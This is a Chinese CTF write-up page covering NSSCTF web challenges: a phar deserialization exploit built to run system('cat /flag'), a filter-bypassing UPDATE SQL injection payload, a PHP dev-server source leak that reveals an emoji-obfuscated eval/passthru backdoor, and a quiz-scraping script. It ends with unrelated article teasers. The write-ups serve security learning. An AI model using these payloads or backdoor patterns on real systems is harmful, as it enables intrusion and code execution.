NSSCTF第16页(2)

[NSSRound#4 SWPU]1zweb(revenge)

查看index.php

<?php
class LoveNss{public $ljt;public $dky;public $cmd;public function __construct(){$this->ljt="ljt";$this->dky="dky";phpinfo();}public function __destruct(){if($this->ljt==="Misc"&&$this->dky==="Re")eval($this->cmd);}public function __wakeup(){$this->ljt="Re";$this->dky="Misc";}
}
$file=$_POST['file'];
if(isset($_POST['file'])){if (preg_match("/flag/", $file)) {die("nonono");}echo file_get_contents($file);
}

查看upload.php

<?php
if ($_FILES["file"]["error"] > 0){echo "上传异常";
}
else{$allowedExts = array("gif", "jpeg", "jpg", "png");$temp = explode(".", $_FILES["file"]["name"]);$extension = end($temp);if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){$content=file_get_contents($_FILES["file"]["tmp_name"]);$pos = strpos($content, "__HALT_COMPILER();");if(gettype($pos)==="integer"){echo "ltj一眼就发现了phar";}else{if (file_exists("./upload/" . $_FILES["file"]["name"])){echo $_FILES["file"]["name"] . " 文件已经存在";}else{$myfile = fopen("./upload/".$_FILES["file"]["name"], "w");fwrite($myfile, $content);fclose($myfile);echo "上传成功 ./upload/".$_FILES["file"]["name"];}}}else{echo "dky不喜欢这个文件 .".$extension;}
}
?>

后缀必须是图片,且内容不能出现phar标志

可以压缩zip绕过

上传后用phar伪协议读取

file_get_contents读phar文件时能能触发返序列化漏洞,绕过一下wakeup()函数 ,并让 ljt=Misc,dky=Re

<?php
ini_set("phar.readonly","Off");
class LoveNss{public $ljt;public $dky;public $cmd;public function __construct(){$this->ljt="Misc";$this->dky="Re";$this->cmd="system('cat /flag');";}
}
$a = new LoveNss();$phar = new Phar('aa.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();?>
#注意要手动将php.ini中的phar.readonly改成Off

得到aa.phar文件

还需要绕一下wakeup()

用010打开修改一下

修改成jpg文件发现上传失败

可能是文件压缩的问题

在kali利用gzip命令 gzip aa.phar

得到aa.phar.gz,改文件名为1.jpg上交,用phar读取发现签名损坏,所以要进行签名修复,phar由data,data签名(20位),和签名格式(8位)组成。 

修复签名的phar文件 gzip压缩后,修改后缀为.png 

最后得到flag

[SWPUCTF 2023 秋季新生赛]NSS大卖场

在提示看到了数据库备份

知道了查询语句

抓个包发现买哪个url就会出现/buy/xxx

标签说是updata注入 ,查查资料

不一样的sql注入_update注入-CSDN博客 

SQL注入之update注入 - 简书 

 在url后输入buy/1'发现有报错,单引号注入

由于得到flag的条件为购买flag,那么我们可以用update语句来让flag只需要一块钱购买

发现被过滤了

空格用%09绕过,updata和where用大小写绕过

1';upDate%09items%09set%09price=1%09Where%09id=8;# 

 

购买然后去背包查看flag

 [MoeCTF 2021]fake game

node.js原型链污染

Nodejs原型链污染 - 知乎

浅谈 Nodejs原型链污染_node 原型-CSDN博客

深入理解 JavaScript Prototype 污染攻击 | 离别歌 p神

第一次学原型链污染,p神的文章很易懂

得到了flag

 [FSCTF 2023]签到plus

发现没有东西

标签提示说是有源码泄露 扫描一下

访问发现是phpinfo页面,得到flag

提交发现是假的flag

去查一一下这个php版本,发现有漏洞

PHP<=7.4.21 Development Server源码泄露漏洞-CSDN博客

PHP<=7.4.21 Development Server源码泄露漏洞

直接利用payload

原理:

  这里我们稍微解释一下第一个GET和第二个GET的作用分别是什么
        第一个GET后的/phpinfo.php是直接访问已存在的phpinfo.php文件(一般可以是访问index.php)
PHP源码中的php_cli_server_request_translate_vpath函数将请求的PHP文件的路径转换为文件系统上的完整路径。如果请求的文件是一个目录,它会检查是否存在索引文件,如index.php或 index.html,并使用其中一个文件的路径(如果找到的话)。这允许服务器响应请求提供正确的文件
        而第二个GET后的/请求的是目录而不是文件。此PHP版本提供的代码包括一个检查,以确定请求的文件是应被视为静态文件还是作为PHP文件执行。这是通过检查文件的扩展名来完成的。如果扩展不是.php或.PHP,或者如果扩展名的长度不等于3,则该文件被视为静态文件,因此如果我们把第二个GET请求的内容改为类似1.txt的文件时,php源码将会被以静态文件的方式泄露(即直接访问获取)
 

成功读取源码

<?php
phpinfo();
$😀="a";
$😁="b";
$😂="c";
$🤣="d";
$😃="e";
$😄="f";
$😅="g";
$😆="h";
$😉="i";
$😊="j";
$😋="k";
$😎="l";
$😍="m";
$😘="n";
$😗="o";
$😙="p";
$😚="q";
$🙂="r";
$🤗="s";
$🤩="t";
$🤔="u";
$🤨="v";
$😐="w";
$😑="x";
$😶="y";
$🙄="z";

$😭 = $😙. $😀. $🤗. $🤗. $🤩. $😆. $🙂. $🤔;

if (isset($_GET['👽🦐'])) {
    eval($😭($_GET['👽🦐']));
};

直接cat,结束

[HGAME 2023 week1]Guess Who I Am 

看源代码有个hint

 打开发现是所有的回答

看了好多wp,知道这道题的类型是爬虫题

大佬的exp

from bs4 import BeautifulSoup
import requests
import jsonanswers = [{"id": "ba1van4","intro": "21级 / 不会Re / 不会美工 / 活在梦里 / 喜欢做不会的事情 / ◼◻粉","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=kSt5er0OQMXROy28nzTia0A&s=640","url": "https://ba1van4.icu"},{"id": "yolande","intro": "21级 / 非常菜的密码手 / 很懒的摸鱼爱好者,有点呆,想学点别的但是一直开摆","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rY328VIqDc7lNtujYic8JxA&s=640","url": "https://y01and3.github.io/"},{"id": "t0hka","intro": "21级 / 日常自闭的Re手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EYNwm1PQe8o5OcghFb4zfw&s=640","url": "https://blog.t0hka.top/"},{"id": "h4kuy4","intro": "21级 / 菜鸡pwn手 / 又菜又爱摆","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=BmACniaibVb6IL6LiaYF4Uvlw&s=640","url": "https://hakuya.work"},{"id": "kabuto","intro": "21级web / cat../../../../f*","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=oPn2ez6Nq12GqPZG6cV7nw&s=640","url": "https://www.bilibili.com/video/BV1GJ411x7h7/"},{"id": "R1esbyfe","intro": "21级 / 爱好歪脖 / 究极咸鱼一条 / 热爱幻想 / 喜欢窥屏水群","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=FLyUHP6nYov19gA0ia83u8Q&s=640","url": "https://r1esbyfe.top/"},{"id": "tr0uble","intro": "21级 / 喜欢肝原神的密码手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=bgcib3gBjJGdKEf7BZ512Uw&s=640","url": "https://clingm.top"},{"id": "Roam","intro": "21级 / 入门级crypto","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5wzr9TVyw2nxOz5Jb7ceaQ&s=640","url": "#"},{"id": "Potat0","intro": "20级 / 摆烂网管 / DN42爱好者","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=NicTy1CDqeHsgzbZEIUU2wg&s=640","url": "https://potat0.cc/"},{"id": "Summer","intro": "20级 / 歪脖手 / 想学运维 / 发呆业务爱好者","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=4y6zxTBSB3cbseeyPvQWng&s=640","url": "https://blog.m1dsummer.top"},{"id": "chuj","intro": "20级 / 已退休不再参与大多数赛事 / 不好好学习,生活中就会多出许多魔法和奇迹","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=aM4tJSQSxB5gcauIMDEtUg&s=640","url": "https://cjovi.icu"},{"id": "4nsw3r","intro": "20级会长 / re / 不会pwn","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=j3LOiav9IluKSYg1VEibblZw&s=640","url": "https://4nsw3r.top/"},{"id": "4ctue","intro": "20级 / 可能是IOT的MISC手 / 可能是美工 / 废物晚期","url": "#"},{"id": "0wl","intro": "20级 / Re手 / 菜","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=06FRYslcuprt59OxibicdhqQ&s=640","url": "https://0wl-alt.github.io"},{"id": "At0m","intro": "20级 / web / 想学iot","url": "https://homeboyc.cn/"},{"id": "ChenMoFeiJin","intro": "20级 / Crypto / 摸鱼学代师","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5xyCaLib3lovjrUzf5pWxDQ&s=640","url": "https://chenmofeijin.top"},{"id": "Klrin","intro": "20级 / WEB / 菜的抠脚 / 想学GO","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=nnzEWNwxMS88jKYre5fOjg&s=640","url": "https://blog.mjclouds.com/"},{"id": "ek1ng","intro": "20级 / Web / 还在努力","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=pJFuHEqNaFk1If1STvRibWw&s=640","url": "https://ek1ng.com"},{"id": "latt1ce","intro": "20级 / Crypto&BlockChain / Plz V me 50 eth","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EmPiaz7Msgg7iaia9tibibjdUyw&s=640","url": "https://lee-tc.github.io/"},{"id": "Ac4ae0","intro": "*级 / 被拐卖来接盘的格子 / 不可以乱涂乱画哦","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EI7A02PYs5WUVFP2bciad8w&s=640","url": "https://twitter.com/LAttic1ng"},{"id": "Akira","intro": "19级 / 不会web / 半吊子运维 / 今天您漏油了吗","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=ku1vqyI1hLJr61PGIlic7Ow&s=640","url": "https://4kr.top"},{"id": "qz","intro": "19级 / 摸鱼美工 / 学习图形学、渲染ing","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=q5qVDcvyzxee4qiays52mibA&s=640","url": "https://fl0.top/"},{"id": "Liki4","intro": "19级 / 脖子笔直歪脖手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=E3j3BJrsAfyl1arfnFKufQ&s=640","url": "https://github.com/Liki4"},{"id": "0x4qE","intro": "19级 / &lt;/p&gt;&lt;p&gt;Web","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=K7icYial1VVzlNl7hrD9MlNw&s=640","url": "https://github.com/0x4qE"},{"id": "xi4oyu","intro": "19级 / 骨瘦如柴的胖手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=JfeMY6Lz5ZU4GmtTV85otQ&s=640","url": "https://www.xi4oyu.top/"},{"id": "R3n0","intro": "19级 / bin底层选手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=icY08gnMlXtoYIJ9ib3eJQ2g&s=640","url": "https://r3n0.top"},{"id": "m140","intro": "19级 / 不会re / dl萌新 / 太弱小了,没有力量 / 想学游戏","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=zt0iccbnGuV8dOpXIYrJgvg&s=640","url": "#"},{"id": "Mezone","intro": "19级 / 普通的binary爱好者。","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rDD29iahzzg8AvQX7fdbFPg&s=640","url": "#"},{"id": "d1gg12","intro": "19级 / 游戏开发 / 🐟粉","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=icawQKtjLcRiaj7scTRBZ9Qw&s=640","url": "https://d1g.club"},{"id": "Trotsky","intro": "19级 / 半个全栈 / 安卓摸🐟 / P 社玩家 / 🍆粉","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=LiasEshjTXTrNzJjPHVY3Vw&s=640","url": "https://altonhe.github.io/"},{"id": "Gamison","intro": "19级 / 挖坑不填的web选手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=0VaAu2go9mvrMXu1ibmKy1g&s=640","url": "http://aw.gamison.top"},{"id": "Tinmix","intro": "19级会长 / DL爱好者 / web苦手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=L2EclrAltb7lk3LBPY6oWA&s=640","url": "http://poi.ac"},{"id": "RT","intro": "19级 / Re手,我手呢?","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=p1TD1qwKfEK8NZExRDqic1A&s=640","url": "https://wr-web.github.io"},{"id": "wenzhuan","intro": "18 级 / 完全不会安全 / 一个做设计的鸽子美工 / 天天画表情包","url": "https://wzyxv1n.top/"},{"id": "Cosmos","intro": "18级 / 莫得灵魂的开发 / 茄粉 / 作豚 /  米厨","url": "https://cosmos.red"},{"id": "Y","intro": "18 级 / Bin / Win / 电竞缺乏视力 / 开发太菜 / 只会 C / CSGO 白给选手","url": "https://blog.xyzz.ml:444/"},{"id": "Annevi","intro": "18级 / 会点开发的退休web手 / 想学挖洞 / 混吃等死","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=WN9x96MpjSJ3Gc7a3SHtDw&s=640","url": "https://annevi.cn"},{"id": "logong","intro": "18 级 / 求大佬带我IoT入门 / web太难了只能做做misc维持生计 / 摸🐟","url": "http://logong.vip"},{"id": "Kevin","intro": "18 级 / Web / 车万","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=jaXAqywDMbia39e4OfGXicPQ&s=640","url": "https://harmless.blue/"},{"id": "LurkNoi","intro": "18级 / 会一丢丢crypto / 摸鱼","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=CLTlN5QPS3aI60icIoxGmdQ&s=640","url": "#"},{"id": "幼稚园","intro": "18级会长 / 二进制安全 /  干拉","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=G2o7mX9RCTkiaCHeEiaJLBwA&s=640","url": "https://danisjiang.com"},{"id": "lostflower","intro": "18级 / 游戏引擎开发 / 尚有梦想的game maker","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=eQHtN69C2tgM8Ul8PmtTKw&s=640","url": "https://r000setta.github.io"},{"id": "Roc826","intro": "18 级 / Web 底层选手","url": "http://www.roc826.cn/"},{"id": "Seadom","intro": "18 级 / Web / 真·菜到超乎想象 / 拼死学(mo)习(yu)中","url": "#"},{"id": "ObjectNotFound","intro": "18级 / 懂点Web & Misc / 懂点运维 / 正在懂游戏引擎 / 我们联合!","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=yQnkF86Uy6UkZrZmFYLL4g&s=640","url": "https://www.zhouweitong.site"},{"id": "Moesang","intro": "18 级 / 不擅长 Web / 擅长摸鱼 / 摸鱼!","url": "https://blog.wz22.cc"},{"id": "E99p1ant","intro": "18级 / 囊地鼠饲养员 / 写了一个叫 Cardinal 的平台","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=AJQ9RJRCavhSibMZtRq2JOQ&s=640","url": "https://github.red/"},{"id": "Michael","intro": "18 级 / Java / 会除我佬","url": "http://michaelsblog.top/"},{"id": "matrixtang","intro": "18级 / 编译器工程师( 伪 / 半吊子PL- 静态分析方向","url": "#"},{"id": "r4u","intro": "18级 / 不可以摸🐠哦","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rJCqQv1EzicpDW77nMa5bYw&s=640","url": "http://r4u.top/"},{"id": "357","intro": "18级 / 并不会web / 端茶送水选手","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=POaV9Y85NiaUcibaETEKTpfw&s=640","url": "#"},{"id": "Li4n0","intro": "17 级 / Web 安全爱好者 / 半个程序员 / 没有女朋友","url": "https://blog.0e1.top"},{"id": "迟原静","intro": "17级 / Focus on Java Security","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=xyVPFvQ2dWReoBiahd7naSw&s=640","url": "#"},{"id": "Ch1p","intro": "17 级 / 自称 Bin 手实际啥都不会 / 二次元安全","url": "http://ch1p.top"},{"id": "f1rry","intro": "17 级 / Web","url": "#"},{"id": "mian","intro": "17 级 / 业余开发 / 专业摸鱼","url": "https://www.intmian.com"},{"id": "ACce1er4t0r","intro": "17级 / 摸鱼ctfer / 依旧在尝试入门bin / 菜鸡研究生+1","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=gRBlwiawx1lF4UkPKh4Liczg&s=640","url": "#"},{"id": "MiGo","intro": "17级 / 二战人 / 老二次元 / 兴趣驱动生活","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=XzZggL7hDeicLXb2FSic6sfg&s=640","url": "https://migoooo.github.io/"},{"id": "BrownFly","intro": "17级 / RedTeamer / 字节跳动安全工程师","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EnNslsFelj9HibuKoNHwmyg&s=640","url": "https://brownfly.github.io"},{"id": "Aris","intro": "17级/ Key厨 / 腾讯玄武倒水的","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=anjeaJmx1X79Yp1DNxWrRA&s=640","url": "https://blog.ar1s.top"},{"id": "hsiaoxychen","intro": "17级 / 游戏厂打工仔 / 来深圳找我快活","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=YGiaicyZ3NkWfOoGOlLPWvAw&s=640","url": "https://chenxy.me"},{"id": "Lou00","intro": "17级 / web / 东南读研","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=fdAMuUicvOObMv3eZC8y0Ew&s=640","url": "https://blog.lou00.top"},{"id": "Junier","intro": "16 级 / 立志学术的统计er / R / 为楼上的脱单事业做出了贡献","url": "#"},{"id": "bigmud","intro": "16 级会长 / Web 后端 / 会一点点 Web 安全 / 会一丢丢二进制","url": "#"},{"id": "NeverMoes","intro": "16 级 / Java 福娃 / 上班 996 / 下班 669","url": "#"},{"id": "Sora","intro": "16 级 / Web Developer","url": "https://github.com/Last-Order"},{"id": "fantasyqt","intro": "16 级 / 可能会运维 / 摸鱼选手","url": "http://0x2f.xyz"},{"id": "vvv_347","intro": "16 级 / Rev / Windows / Freelancer","url": "https://vvv-347.space"},{"id": "veritas501","intro": "16 级 / Bin / 被迫研狗","url": "https://veritas501.space"},{"id": "LuckyCat","intro": "16 级 / Web 🐱 / 现于长亭科技实习","url": "https://jianshu.com/u/ad5c1e097b84"},{"id": "Ash","intro": "16 级 / Java 开发攻城狮 / 996 选手 / 濒临猝死","url": "#"},{"id": "Cyris","intro": "16 级 / Web 前端 / 美工 / 阿里云搬砖","avatar": "https://cdn.jsdelivr.net/npm/cyris/images/avatar.png","url": "https://cyris.moe/"},{"id": "Acaleph","intro": "16 级 / Web 前端 / 水母一小只 / 程序员鼓励师 / Cy 来组饥荒!","url": "#"},{"id": "b0lv42","intro": "16级 / 大果子 / 毕业1年仍在寻找vidar娘接盘侠","url": "https://b0lv42.github.io/"},{"id": "ngc7293","intro": "16 级 / 蟒蛇饲养员 / 高数小王子","url": "https://ngc7292.github.io/"},{"id": "ckj123","intro": "16 级 / Web / 菜鸡第一人","url": "https://www.ckj123.com"},{"id": "cru5h","intro": "16级 / 前web手、现pwn手 / 菜鸡研究生 / scu","avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5kpiaPnLZ1cWrp0G8O4qHDg&s=640","url": "#"},{"id": "xiaoyao52110","intro": "16 级 / Bin 打杂 / 他们说菜都是假的,我是真的","url": "#"},{"id": "Undefinedv","intro": "15 级网安协会会长 / Web 安全","url": "#"},{"id": "Spine","intro": "逆向 / 二进制安全","url": "#"},{"id": "Tata","intro": "二进制 CGC 入门水准 / 半吊子爬虫与反爬虫","url": "#"},{"id": "Airbasic","intro": "Web 安全 / 长亭科技安服部门 / TSRC 2015 年年度英雄榜第八、2016 年年度英雄榜第十三","url": "#"},{"id": "jibo","intro": "15 级 / 什么都不会的开发 / 打什么都菜","url": "#"},{"id": "Processor","intro": "15 级 Vidar 会长 / 送分型逆向选手 / 13 段剑纯 / 差点没毕业 / 阿斯巴甜有点甜","url": "https://processor.pub/"},{"id": "HeartSky","intro": "15 级 / 挖不到洞 / 打不动 CTF / 内网渗透不了 / 工具写不出","url": "http://heartsky.info"},{"id": "Minygd","intro": "15 级 / 删库跑路熟练工 / 没事儿拍个照 / 企鹅","url": "#"},{"id": "Yotubird","intro": "15 级 / 已入 Python 神教","url": "#"},{"id": "c014","intro": "15 级 / Web 🐶 / 汪汪汪","url": "#"},{"id": "Explorer","intro": "14 级 HDUISA 会长 / 二进制安全 / 曾被 NULL、TD、蓝莲花等拉去凑人数 / 差点没毕业 / 长亭安研","url": "#"},{"id": "Aklis","intro": "14 级 HDUISA 副会长 / 二次元 / 拼多多安全工程师","url": "#"},{"id": "Sysorem","intro": "14 级网安协会会长 / HDUISA 成员 / Web 安全 / Freebuf 安全社区特约作者 / FSI2015Freebuf 特邀嘉宾","url": "#"},{"id": "Hcamael","intro": "13 级 / 知道创宇 404 安全研究员 / 现在 Nu1L 划划水 / IoT、Web、二进制漏洞,密码学,区块链都看得懂一点,但啥也不会","url": "#"},{"id": "LoRexxar","intro": "14 级 / Web 🐶 / 杭电江流儿 / 自走棋主教守门员","url": "https://lorexxar.cn/"},{"id": "A1ex","intro": "14 级网安协会副会长 / Web 安全","url": "#"},{"id": "Ahlaman","intro": "14 级网安协会副会长 / 无线安全","url": "#"},{"id": "lightless","intro": "Web 安全 / 安全工程师 / 半吊子开发 / 半吊子安全研究","url": "https://lightless.me/"},{"id": "Edward_L","intro": "13 级 HDUISA 会长 / Web 安全 / 华为安全部门 / 二进制安全,fuzz,符号执行方向研究","url": "#"},{"id": "逆风","intro": "13 级菜鸡 / 大数据打杂","url": "https://github.com/deadwind4"},{"id": "陈斩仙","intro": "什么都不会 / 咸鱼研究生 / <del>安恒</del>、<del>长亭</del> / SJTU","url": "https://mxgcccc4.github.io/"},{"id": "Eric","intro": "渗透 / 人工智能 / 北师大博士在读","url": "https://3riccc.github.io"}
]def get_anser(str):for i in range(len(answers)):if str == answers[i]['intro']:return answers[i]['id']if __name__ == '__main__':url = 'http://node5.anna.nssctf.cn:28417'verifyAnswer = url + '/api/verifyAnswer'getQuestion = url +'/api/getQuestion'score = url+'/api/getScore's = requests.session()for i in range(len(answers)):r = s.get(getQuestion)soup = BeautifulSoup(r.text, "html.parser")question = json.loads(soup.contents[0])['message']answer = get_anser(question)# print(question,":",answer)data = {'id':answer}veri_r = s.post(verifyAnswer,data=data)print(s.get(score).text)

得到flag

爬虫脚本没有进行学习过,还是差了很多东西

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/227956.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

day01unittest复习,断言

day01unittest复习,断言

1.unittest 方法执行前 # def setUp(self) -> None: # print(方法执行前执行) # # def tearDown(self) -> None: # print(方法执行后执行一次) 2.unittest 类方法执行前后执行一次 classmethod def setUpClass(cls) -> None:print(类执行前执行一次)classm…
阅读更多...
微分和导数(一)

微分和导数(一)

1.微分&#xff1a; 假设我们有⼀个函数f : R → R&#xff0c;其输⼊和输出都是标量。如果f的导数存在&#xff0c;这个极限被定义为 如果f′(a)存在&#xff0c;则称f在a处是可微的。如果f在⼀个区间内的每个数上都是可微的&#xff0c;则此函数在此区间中是可微的。导数f′…
阅读更多...
网络协议 - UDP 协议详解

网络协议 - UDP 协议详解

网络协议 - UDP 协议详解 UDP概述UDP特点UDP的首部格式UDP校验 參考文章 基于TCP和UDP的协议非常广泛&#xff0c;所以也有必要对UDP协议进行详解。 UDP概述 UDP(User Datagram Protocol)即用户数据报协议&#xff0c;在网络中它与TCP协议一样用于处理数据包&#xff0c;是一种…
阅读更多...
必要时进行保护性拷贝

必要时进行保护性拷贝

保护性拷贝&#xff08;Defensive Copy&#xff09;是一种常见的编程实践&#xff0c;用于在传递参数或返回值时&#xff0c;创建副本以防止原始对象被意外修改。以下是一个例子&#xff0c;展示了何时进行保护性拷贝&#xff1a; mport java.util.ArrayList; import java.uti…
阅读更多...
数据手册Datasheet解读-肖特基二极管笔记

数据手册Datasheet解读-肖特基二极管笔记

数据手册Datasheet解读笔记1-肖特基二极管 数据手册大体结构共包含10个部分肖特基二极管-SS14第一重点关注点&#xff1a;极限值第二重点关注点&#xff1a;电气特性 数据手册大体结构共包含10个部分 1.Features一特性 2.Application一应用 3.Description一说明4.Pin Configur…
阅读更多...
关于在Java中打印“数字”三角形图形的汇总

关于在Java中打印“数字”三角形图形的汇总

之前写过一篇利用*打印三角形汇总&#xff0c;网友需要查看可以去本专栏查找之前的文章&#xff0c;这里利用二维数组嵌套循环打印“数字”三角形&#xff0c;汇总如下&#xff0c;话不多说&#xff0c;直接上代码&#xff1a; /*** 打印如下数字三角形图形*/ public class Wo…
阅读更多...
逻辑分析仪_使用手册

逻辑分析仪_使用手册

LA1010 1> 能干啥&#xff1f;2> 硬件连接3> 软件安装4> 参数设置4.1> 采样深度和采样率4.2> 添加协议解析器4.3> 毛刺过滤设置 1> 能干啥&#xff1f; 测量通信波形&#xff0c;并自动解析&#xff1b; 比如测量&#xff0c;UART&#xff0c;SPI&…
阅读更多...
【DataSophon】大数据管理平台DataSophon-1.2.1安装部署详细流程

【DataSophon】大数据管理平台DataSophon-1.2.1安装部署详细流程

&#x1f984; 个人主页——&#x1f390;开着拖拉机回家_Linux,大数据运维-CSDN博客 &#x1f390;✨&#x1f341; &#x1fa81;&#x1f341;&#x1fa81;&#x1f341;&#x1fa81;&#x1f341;&#x1fa81;&#x1f341; &#x1fa81;&#x1f341;&#x1fa81;&am…
阅读更多...
java_web_电商项目

java_web_电商项目

java_web_电商项目 1.登录界面2.注册界面3. 主界面4.分页界面5.商品详情界面6. 购物车界面7.确认订单界面8.个人中心界面9.收货地址界面10.用户信息界面11.用户余额充值界面12.后台首页13.后台商品增加14.后台用户增加15.用户管理16.源码分享1.登录页面的源码2.我们的主界面 1.…
阅读更多...
在线二进制原码,补码,反码计算器

在线二进制原码,补码,反码计算器

具体请前往&#xff1a;在线原码/反码/补码计算器
阅读更多...
LLM中的Prompt提示

LLM中的Prompt提示

简介 在LLM中&#xff0c;prompt&#xff08;提示&#xff09;是一个预先设定的条件&#xff0c;它可以限制模型自由发散&#xff0c;而是围绕提示内容进行展开。输入中添加prompt&#xff0c;可以强制模型关注特定的信息&#xff0c;从而提高模型在特定任务上的表现。 结构 …
阅读更多...
会声会影怎么使用? 会声会影2024快速掌握入门技巧

会声会影怎么使用? 会声会影2024快速掌握入门技巧

一听说视频剪辑我们就不由得联想到电影、电视等一些高端的视频剪辑技术&#xff0c;大家都觉得视频剪辑是一个非常复杂而且需要很昂贵的设备才可以完成的技术活&#xff0c;这对很多“门外汉”来说都可望而不可及。实际上&#xff0c;使用会声会影剪辑视频不仅是很多人都可以操…
阅读更多...
【深度强化学习】策略梯度方法:REINFORCE、Actor-Critic

【深度强化学习】策略梯度方法:REINFORCE、Actor-Critic

参考 Reinforcement Learning, Second Edition An Introduction By Richard S. Sutton and Andrew G. Barto非策略梯度方法的问题 之前的算法&#xff0c;无论是 MC&#xff0c;TD&#xff0c;SARSA&#xff0c;Q-learning&#xff0c; 还是 DQN、Double DQN、Dueling DQN…
阅读更多...
STM32G030C8T6:使用按键控制LED亮灭(外部中断)

STM32G030C8T6:使用按键控制LED亮灭(外部中断)

本专栏记录STM32开发各个功能的详细过程&#xff0c;方便自己后续查看&#xff0c;当然也供正在入门STM32单片机的兄弟们参考&#xff1b; 本小节的目标是&#xff0c;系统主频64 MHZ,采用高速外部晶振&#xff0c;通过KEY1 按键的PA0 引脚配置成中断输入引脚&#xff0c;PB9引…
阅读更多...
写好ChatGPT提示词原则之:清晰且具体(clear specific)

写好ChatGPT提示词原则之:清晰且具体(clear specific)

ChatGPT 的优势在于它允许用户跨越机器学习和深度学习的复杂门槛&#xff0c;直接利用已经训练好的模型。然而&#xff0c;即便是这些先进的大型语言模型也面临着上下文理解和模型固有局限性的挑战。为了最大化这些大型语言模型&#xff08;LLM&#xff09;的潜力&#xff0c;关…
阅读更多...
Spring 6(二)【IOC原理】

Spring 6(二)【IOC原理】

前言 1、IOC IoC 是 Inversion of Control 的简写&#xff0c;译为“控制反转”&#xff0c;它不是一门技术&#xff0c;而是一种设计思想&#xff0c;是一个重要的面向对象编程法则&#xff0c;能够指导我们如何设计出松耦合、更优良的程序。 1.1、控制反转 控制反转不是技术…
阅读更多...
visual Studio MFC 平台实现图片的傅里叶变换

visual Studio MFC 平台实现图片的傅里叶变换

图片的傅里叶变换 本文主要讲解傅里叶变换的基本数学概念与物理概念&#xff0c;并本文使用visual Studio MFC 平台实现对傅里叶变换在图片上进行了应用。 一、傅里叶变换的原理 在这里推荐一篇讲得非常形象的文章通俗讲解&#xff1a;图像傅里叶变换 1.1 傅里叶变换原理的说明…
阅读更多...
idea__SpringBoot微服务11——整合Druid数据源(新依赖)(新注解)

idea__SpringBoot微服务11——整合Druid数据源(新依赖)(新注解)

整合JDBC 一、导入依赖二、配置Druid————————创作不易&#xff0c;如觉不错&#xff0c;随手点赞&#xff0c;关注&#xff0c;收藏(*&#xffe3;︶&#xffe3;)&#xff0c;谢谢~~ 接着 第10的 新注解&#xff1a; ConfigurationProperties ConfigurationPropert…
阅读更多...
【人工智能】实验四:遗传算法求函数最大值实验与基础知识

【人工智能】实验四:遗传算法求函数最大值实验与基础知识

实验四&#xff1a;遗传算法求函数最大值实验 实验目的 熟悉和掌握遗传算法的原理、流程和编码策略&#xff0c;并利用遗传算法求解函数优化问题&#xff0c;理解求解流程并测试主要参数对结果的影响。 实验内容 采用遗传算法求解函数最大值。 实验要求 1. 用遗传算法求解…
阅读更多...
3. cgal 示例 GIS (Geographic Information System)

3. cgal 示例 GIS (Geographic Information System)

GIS (Geographic Information System) 地理信息系统 原文地址: https://doc.cgal.org/latest/Manual/tuto_gis.html GIS 应用中使用的许多传感器&#xff08;例如激光雷达&#xff09;都会生成密集的点云。此类应用程序通常利用更先进的数据结构&#xff1a;例如&#xff0c;不…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023